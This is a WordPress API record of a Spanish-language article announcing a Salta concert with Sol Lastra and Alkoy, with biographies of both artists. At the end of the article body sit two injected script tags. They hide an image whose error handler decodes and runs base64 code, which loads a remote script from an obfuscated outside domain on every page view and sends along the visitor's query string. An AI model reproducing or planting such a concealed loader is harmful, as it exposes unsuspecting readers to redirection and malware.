{"id":3312,"date":"2023-11-16T12:43:13","date_gmt":"2023-11-16T15:43:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3312"},"modified":"2025-08-14T00:05:11","modified_gmt":"2025-08-14T03:05:11","slug":"sol-lastra-y-alkoy-en-la-penultima-fecha-de-generacion-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3312","title":{"rendered":"Sol Lastra y Alkoy en la pen\u00faltima fecha de Generaci\u00f3n Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#950e48\"><em>Los artistas se preparan para hacer su presentaci\u00f3n en una de las noches finales del ciclo musical de Cerveza Salta en la Usina Cultural, Espa\u00f1a 198.<\/em><\/h3>\n\n\n\n<p>A lo largo de las siete fechas previas, Generaci\u00f3n Salta sumergi\u00f3 al p\u00fablico en un viaje musical m\u00e1gico donde m\u00e1s de 15 bandas salte\u00f1as destellaron talento y pasi\u00f3n con diversos g\u00e9neros musicales. Comenz\u00f3 noviembre y ya se palpita lo que ser\u00e1 la pen\u00faltima fecha de Generaci\u00f3n Salta, el ciclo musical que desde principio de a\u00f1o une al p\u00fablico salte\u00f1o con artistas locales a trav\u00e9s de presentaciones mensuales gratuitas.<\/p>\n\n\n\n<p>Este s\u00e1bado 18 de noviembre a partir de las 20 H, la Usina Cultural volver\u00e1 a encenderse con una propuesta que unir\u00e1 los sonidos y destrezas de Sol Lastra, con las afiladas letras y ritmos de Alkoy. Las entradas pueden conseguirse de manera gratuita en At\u00edpiko (Zuvir\u00eda 408).<\/p>\n\n\n\n<p>Generaci\u00f3n Salta se forj\u00f3 a lo largo de los \u00faltimos meses como un nuevo espacio para visibilizar y difundir las habilidades y talento musical de la juventud salte\u00f1a. De esta forma Cerveza Salta incentiva y apoya a los artistas nacientes que desean dar a conocer su destreza a la hora de desenvolverse en el escenario proponiendo nuevos sonidos y canales de expresi\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9853-sol-lastra-y-alkoy-en-la-penultima-fecha-de-generacion-salta-20231114133202.png\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9853-sol-lastra-y-alkoy-en-la-penultima-fecha-de-generacion-salta-20231114133202.png\" alt=\"Sol Lastra y Alkoy en la pen\u00faltima fecha de Generaci\u00f3n Salta\"\/><\/a><\/figure>\n\n\n\n<p><strong>Sol Lastra<\/strong><\/p>\n\n\n\n<p>Sol Candela Lastra naci\u00f3 en Salta Capital. Desde sus 5 a\u00f1os se incorpor\u00f3 a la danza hasta que en la adolescencia decidi\u00f3 comenzar la carrera como bailarina y profesora.<\/p>\n\n\n\n<p>A partir de ese momento dej\u00f3 de ser un hobby para centrarse de lleno en danzas urbanas como el dancehall, reggaet\u00f3n y hip hop.<\/p>\n\n\n\n<p>En su carrera, form\u00f3 parte de shows de reconocidos artistas, adem\u00e1s potenci\u00f3 su perfil de influencer.<\/p>\n\n\n\n<p>A los 21 a\u00f1os se propuso un nuevo desaf\u00edo: comenzar a hacer m\u00fasica para conjugar con su baile. Es as\u00ed como en 2022 lanz\u00f3 su primer sencillo \u201cDinamita\u201d lo que le permiti\u00f3 presentarse en diferentes shows y eventos. Ahora, la lista de sus sencillos ya incluye otras canciones como: Quien te lo mueve, Pobre Diabla, Rakata, Tal Vez, Cuando me bailas y colaboraciones con otros artistas.<\/p>\n\n\n\n<p><strong>Alkoy<\/strong><\/p>\n\n\n\n<p>Alkoy es un rapero salte\u00f1o que plasma en sus letras su percepci\u00f3n de la realidad. Su flow y l\u00edrica se nutren de una mirada superlativa de lo cotidiano, llevando su rap hacia una perspectiva filos\u00f3fica.<\/p>\n\n\n\n<p>Alkoy viene pisando fuerte el under norte\u00f1o y nacional, coronando varias competencias nacionales como Supremac\u00eda 2022, Perros de la Calle 2022, Copa Federaci\u00f3n 2022, Cultura Rap Federal 2023. As\u00ed mismo, est\u00e1 clasificado a lo que es considerado el evento de freestyle m\u00e1s importante del Pa\u00eds (REDBULL BATALLA 2023).<\/p>\n\n\n\n<p>Cuenta con 2 EP, titulados \u201c22\u201d y \u201cWYBI\u201d con los que llega al escenario de Generaci\u00f3n Salta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de prensa y difusi\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los artistas se preparan para hacer su presentaci\u00f3n en una de las noches finales del ciclo musical de Cerveza Salta en la Usina Cultural, Espa\u00f1a 198. A lo largo de las siete fechas previas, Generaci\u00f3n Salta sumergi\u00f3 al p\u00fablico en un viaje musical m\u00e1gico donde m\u00e1s de 15 bandas salte\u00f1as destellaron talento y pasi\u00f3n con [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3313,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[10,17],"tags":[],"class_list":{"0":"post-3312","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-colaboradores","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3312"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3312"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3312\/revisions"}],"predecessor-version":[{"id":6917,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3312\/revisions\/6917"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3313"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3312"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3312"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}